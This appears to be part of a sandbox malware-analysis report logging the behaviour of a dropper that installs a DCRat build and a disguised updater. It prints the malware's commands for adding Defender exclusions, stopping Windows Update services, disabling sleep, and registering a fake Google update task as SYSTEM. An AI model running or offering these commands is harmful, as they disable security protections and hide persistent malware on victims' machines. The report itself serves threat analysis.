Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03

Source: C:\Users\user\Desktop\launcher.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\hs.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: sfxname	3_2_0008DF1E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: sfxstime	3_2_0008DF1E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: STARTDLG	3_2_0008DF1E

Source: launcher.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\launcher.exe.bin.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: launcher.exe.bin.exe	Virustotal: Detection: 87%
Source: launcher.exe.bin.exe	ReversingLabs: Detection: 97%

Source: unknown	Process created: C:\Users\user\Desktop\launcher.exe.bin.exe "C:\Users\user\Desktop\launcher.exe.bin.exe"
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\hs.exe "C:\Users\user\AppData\Local\Temp\hs.exe"
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\launcher.exe "C:\Users\user\AppData\Local\Temp\launcher.exe"
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c pause
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\hs.exe "C:\Users\user\AppData\Local\Temp\hs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\launcher.exe "C:\Users\user\AppData\Local\Temp\launcher.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c pause	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
